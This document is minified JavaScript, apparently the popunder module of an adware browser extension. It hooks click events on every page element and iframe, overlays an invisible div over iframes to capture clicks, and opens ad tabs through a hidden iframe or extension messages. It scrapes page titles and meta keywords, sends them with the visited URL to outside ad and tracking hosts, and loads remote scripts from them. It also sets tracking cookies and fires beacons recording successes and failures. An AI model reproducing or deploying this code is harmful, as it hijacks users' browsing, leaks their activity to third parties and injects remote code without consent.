_GPL.j(function(f,b,ia,A,n,g,l,va,wa,rb,ja,t,bb,ka,u,sb,p,xa,X,ya,B,v,tb,w,cb,T){function L(){za(h,X,L);db(function(a,c){d=a;Y||(Y=!0,eb(),fb(),la(),Aa(h,X,la),Ba=ka(function(){36E5<+new n-Ca&&U(!1)},5E3))})}function la(){Ca=+new n}function U(a){Y&&(f("iframe").off("mouseover",Da),M.remove(),Y=!1,ia(Ba),gb(),za(h,X,la),d=void 0,F=x="",a||Aa(h,X,L),u(L,1E3*Math.max(G,y)))}function Aa(a,c,e){if(p[xa])a[xa](c,e,!1);else a.attachEvent("on"+c,e)}function fb(){Z=!0;b.ah&&b.ah(C,N);f("*").add(p).on(C,N);
Ea||(Ea=!0,f("*").add(p).on("mousedown mouseup click",Fa));f("iframe").each(function(a,c){try{f(c.contentWindow).on(C,N)}catch(e){}});Ga=ka(function(){f("iframe").each(function(a,c){c[Ha]||(c[Ha]=1,f(c).mouseover(Da))})},100);if(V)try{b.log("Attempting to pop from extension to: "+d);var a="ld893_";x&&(a+="_"+g(x),F&&(a+=","+F),a+="_");var a=a+("_"+E()),c=b.proto+b.baseCDN+"/pwn.html?u="+g(d)+"&n="+a+"&r=";"h"!=V||O?"w"!=V||O||(O=!0,ma(p,"openThatTabBitch",{url:c,isUnder:!1,attr:"z7b85_91c4"}),u(function(){O=
!1},100)):(O=!0,ma(h,"createNewTab",{url:c,focused:"true"}),ma(h.documentElement,"createNewTab",{url:c,focused:"true"}),u(function(){O=!1},100));var e=ka(function(){h.documentElement.getAttribute("z7b85_91c4")&&(ia(e),U(!0),Ia(),h.documentElement.removeAttribute("z7b85_91c4"))},50)}catch(Ja){}}function ma(a,c,e){if(h.createEvent){var b=h.createEvent("CustomEvent");b.initCustomEvent(c,!1,!1,e);a.dispatchEvent(b)}else b=h.createEventObject(),b.detail=e,b.realType=c,a.fireEvent("ondataavailable",b)}
function H(a){a=ja.userAgent.match(bb(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function hb(){if(H("Chrome")){for(var a=0;a<ja.plugins.length;a++)if("Widevine Content Decryption Module"==ja.plugins[a].name)return!1;return!0}return!1}function eb(){M||(M=f('<div style="z-index:999999999999999;cursor:pointer;display:none;position:absolute;background:transparent;">&nbsp;</div>').appendTo("body"),M.mouseout(function(){M.hide()}))}function Da(a){var c=f(a.target),e=c.offset();e.width=c.outerWidth();e.height=
c.outerHeight();e.display="block";M.css(e);a.stopPropagation()}function ib(a){if(d!=Ka){a=a.target||a.srcElement;for(var c="";a;){P||(P=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){c=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}if(!d)return!1;c&&(d+="&t="+g(c.substring(0,Math.max(0,1500-d.length))));d+="&rt="+(+new n-La);P&&(d+="&data_tag="+g(P));"/"!=l.pathname&&(d+="&mk="+g(b.B64.encode(na().substring(0,Math.max(0,1500-d.length)))));d+=
Ma?"&data_sid="+g(Ma):""}b.log("Popping to: "+d);a="ld893_";x&&(a+="_"+g(x),F&&(a+=","+F),a+="_");c=a+="_"+E();Q.parentNode||(Na=Oa());if(a=Na("",1749==q?c:"_blank"))a.name=c,0.02>Math.random()?(c=""+d,-1<d.indexOf(aa)&&(c="http://"+aa+"/pclk?c="+g(x)+"&crl="+g(d)),a.location.href=c):a.location.href=d;return a}function na(){function a(a){return a.toLowerCase().replace(/[.,!?]/g," ").split(" ")}var c=[];f("title").length&&(c=c.concat(a(f("title").text())));f('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var e=
f.trim(f(this).attr("content"));e&&e.match(/^\s*[a-zA-Z0-9]/)&&(c=c.concat(a(e)))});return f.trim(function(a){var c=[];f.each(a,function(a,e){-1==f.inArray(e,c)&&c.push(e)});return c}(c).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function Pa(a,c){a=(a||l.href).substr(0,1500);var e="/"!=l.pathname?na():"";a=a.replace(/:/g,"%3A");var e=e.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),Ja=b.getSubId?"&subid="+b.getSubId(ba):"",e=g(b.B64.encode(a+"::z-"+q+"-"+Qa+"::"+e)),d="&cb="+
(c||oa),d=d+("&data_fr="+(Ra(z)?"false":"true")),d=d+("&data_proto="+g(l.protocol));return b.proto+aa+"/pops?c="+e+"&a=1&ch="+g(W)+Ja+d}function za(a,c,e){if(p[ya])a[ya](c,e,!1);else a.detachEvent("on"+c,e)}function gb(){Z=!1;b.rh&&b.rh(C,N);f("*").add(p).off(C,N);f("iframe").each(function(a,c){try{f(c.contentWindow).off(C,N)}catch(e){}});ia(Ga)}function jb(a){a=a||p.event||{};if(V&&h.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;a=a.parentNode}return!1}
function kb(a,c){var e=0,b;c=c||[];for(var g=Math.random(),d=0;d<c.length;d++)if(e+=c[d][1],g<e&&!b&&(b=c[d][0]),c[d][0]==a){b=a;break}return b||c[0][0]}function R(a,c){a=t(a,10);isNaN(a)&&(a=t(ca&&ca.getItem(c)||b.gc(c,10),10)||0);return a}function Ra(a){return(new n(1E3*(a||0))).toDateString()==(new n).toDateString()}function da(){z|=0;r|=0;I|=0;var a=E(),c=r&&!Ra(z);c&&(r=0,s.set(w,r));var e=!J||a-z>=G&&r<J,a=a-I>=y;return!m&&c||e&&a}function N(a){a=a||p.event;if(!jb(a)){var c=Z&&lb(),e=c&&ib(a);
if(e&&!e.closed)return U(!0),Ia(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_success&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random(),ea&&A(ea),fa&&A(fa),pa=!0,Fa(a);e&&e.closed?fa||(fa=u(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+g(d)+"&location="+g(l.hostname)+"&pid="+q+"&tag="+g(P||"")+"&r="+999999999*Math.random()},1E3)):c&&(ea||(ea=u(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+g(d)+
"&location="+g(l.hostname)+"&pid="+q+"&tag="+g(P||"")+"&r="+999999999*Math.random()},1E3)))}}function lb(){if(!s.swf)return!0;z=R(s.get(B),B);316808>Sa.score&&(r=R(s.get(w),w));var a=Ta(s.get(v));I=R(a[S],v);return da()}function E(){return va(new n/1E3)}function Ua(a,c,e){s.set(a,e);e=E();ca&&ca.setItem(a,e);c=t(c,10);var b=new n;b.setSeconds(b.getSeconds()+c);h.cookie=a+"="+e+";expires="+b.toUTCString()+";path=/;domain="+S}function Ia(){var a=E();Ua(B,G,a);s.set(cb,a);z=a;s.set(w,++r);y&&Ua(v,y,
ga+(ga&&",")+S+":"+a)}function Ta(a){var c={},b=E(),d=[];a=(a||"").split(",");if(a.length){for(var g=0;g<a.length;++g){var f=a[g].split(":"),h=t(f[1],10);b-h<y&&(c[f[0]]=h,d.push(f[0]+":"+h))}ga=d.join(",");s.set(v,ga)}return c}function qa(){return da()||m?1:E()-(t(I,10)||0)<y?Infinity:r>=J?"US"==b.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?88620:59858:"US"==b.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?59858:49928}function mb(a){"US"==b.vars.cid?ra(a,47432,
149058):-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?ra(a,59858,88620):ra(a,49928,59858);return da()}function ra(a,c,b){a>=c&&(G=0,a>=b&&r>=J&&(r=wa(0,J-1)))}function Va(a){A(ha);if(!m&&1735!=q){var c=qa(),b="http://clkmon.com/adServe/banners?pid=14442&cid="+Qa+"&action=r&q=",d="/"!=l.pathname?na():"",b=b+g(d.substring(0,Math.max(0,1500-b.length)));p[oa]({url:b,score:c});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&reason="+g(a)+"&pid="+q+"&u="+g(l.hostname)+"&r="+999999999*
Math.random()}}function db(a){!function e(){s.get(["frt","_GPL_oo_z7b85",B,v,w,T],function(d){if(d.v.frt){if("1750"==q){var f=t(d.v._GPL_oo_z7b85,10)||0;if(86400>va(new n/1E3)-f)return}Wa.getAttribute("data-openThatTabBitch")&&"t3"==b.vars.wptg&&(f=["wp_t3_c","wp_t3_t"],k=d.v[T],k&&-1!=f.indexOf(k)||(k=f[Math.floor(Math.random()*f.length)],s.set(T,k)),"wp_t3_t"==k&&(V="w"));k||(k=d.v[T],k=kb(k,[["20150703_c",0.85],["20150703_t_95",0.01],["20150703_t_90",0.01],["20150703_t_85",0.01],["20150703_t_80",
0.01],["20150703_t_75",0.01],["20150703_t_70",0.01],["20150703_t_65",0.01],["20150703_t_60",0.01],["20150703_t_55",0.01],["20150703_t_50",0.01],["20150703_t_45",0.01],["20150703_t_40",0.01],["20150703_t_35",0.01],["20150703_t_30",0.01],["20150703_t_25",0.01]]),s.set(T,k));Xa||(Xa=!0,b.pc(function(){Ya?Ya=!1:Z||(sa=!1,U(),L())}));p[oa]=function(b){nb(b,a)};f=E();z=R(d.v[B],B);r=R(d.v[w],w);d=Ta(d.v[v]);I=R(d[S],v);if(da()){d=qa();ta=+new n;var l=h.createElement("script");l.src=Pa()+"&ms="+d+"&r="+
f;l.onerror=function(){Va("error")};Wa.appendChild(l);(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random();A(ha);ha=u(function(){Va("time")},15E3)}else d=qa(),b.log("minScoreNeeded: "+d),Infinity>d&&!sa&&!m&&(ta=+new n,b.insertJS(Pa()+"&ms="+d+"&r="+f),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*
Math.random(),sa=!0),A(ua),ua=u(e,1E3*(5+wa(f,z+G,I+y)-f))}})}()}function Oa(){Q=h.createElement("iframe");Q.style.display="none";Q.style.visibility="hidden";h.body.appendChild(Q);return Q.contentWindow.open}function Fa(a){if(pa)return a.cancelBubble=!0,a.stopPropagation&&a.stopPropagation(),a.stopImmediatePropagation&&a.stopImmediatePropagation(),a.preventDefault&&a.preventDefault(),u(function(){pa=!1},100),!1}function nb(a,c){A(ha);var d=+new n-ta;F=x="";if(a){a.crid&&(F=a.crid);a.cid&&(x=a.cid,
a.url||(a.url="http://"+aa+"/click?c="+g(x),a.url+=b.getSubId?"&subid="+b.getSubId(ba):"",a.url+=k?"&data_test="+g(k):"",a.url+="&data_fb="+(hb()?"yes":"no"),a.url+="&data_rtt="+d,a.url+="&data_proto="+g(l.protocol),a.url+="&data_ic="+(Za?"true":"false"),a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||0)));m&&!a.cid&&(a.url=Ka,a.cid="xr");var d=t(a.score,10),f=!a.mp;if(!f&&k&&-1<k.indexOf("20150703_t_")){var h=t(k.split("_")[2]);100*parseFloat(a.mp)>=h&&(f=!0)}m||f&&0<d&&mb(d)?
(La=+new n,A(ua),a.url&&a.expires&&(A($a),$a=u(function(){U(!0);L()},1E3*t(a.expires,10))),Sa={score:d,now:new n/1},c(a.url,d),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_bid&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random()):(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_nobid&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random()}}var s=b.items.e6a00,h=p.document,Wa=h.body,ca=p.localStorage,ob=H("chrome"),
pb=H("firefox");H("opera");var qb=H("safari");H("webkit");var W=b.item_vars["22555_ch"]||b.item_vars.ch||"",G,z,I,K=b.dt(),K=K&&K.inherited&&K.inherited.t||[],m="x"==W||-1<K.indexOf("adult")||0==K.length&&0<f('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;m&&(-1==K.indexOf("adult_block")?W="x":(W="x-issue",m=!1));var y,ba="z7b85",aa=b.gsd&&b.gsd(ba)||"s.hklmm.com",Y=!1,Ba,Ca,Z=!1,S=b.gd(),d,La=0,ta=0,$a,ga="",r=0,J,Sa={},x="",F="",ua,sa=!1,k,ea,fa,ha,P,C="click";if(ob||qb)C="mousedown";else if(pb||
h.all||H("trident"))C="mouseup";var ab=b.zoneid(ba,!0).split("_"),Qa=ab[0],q=ab[1]||b.vars.pid,Ma=b.vars.systemid,Ka="http://secure.xsrving.com/display?size=800x600&ch="+g(W)+"&referer="+g(S),V=!1,O=!1,oa=b.rs(20),M,Ha=b.rs(12),Ga,Za=function(){try{return p[(p.btoa||function(a){return a})(l.hostname+"::"+(new n).toDateString())]===l.protocol}catch(a){return!1}}(),Xa=!1,Ya=!0,Q,Na=Oa(),pa=!1,Ea=!1;1797==q&&"GB"==b.vars.cid||"facebook.com"==S||(Za?(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=idlecrawler&d="+
g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+q+"&r="+999999999*Math.random():(m?(J=G=0,y=180,B+="_xr",v+="_xr",w+="_xr"):(G=360,J=4,y=360),L()))},_GPL,clearInterval,clearTimeout,Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener","ld893_pop_g","ld893_pop_s","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
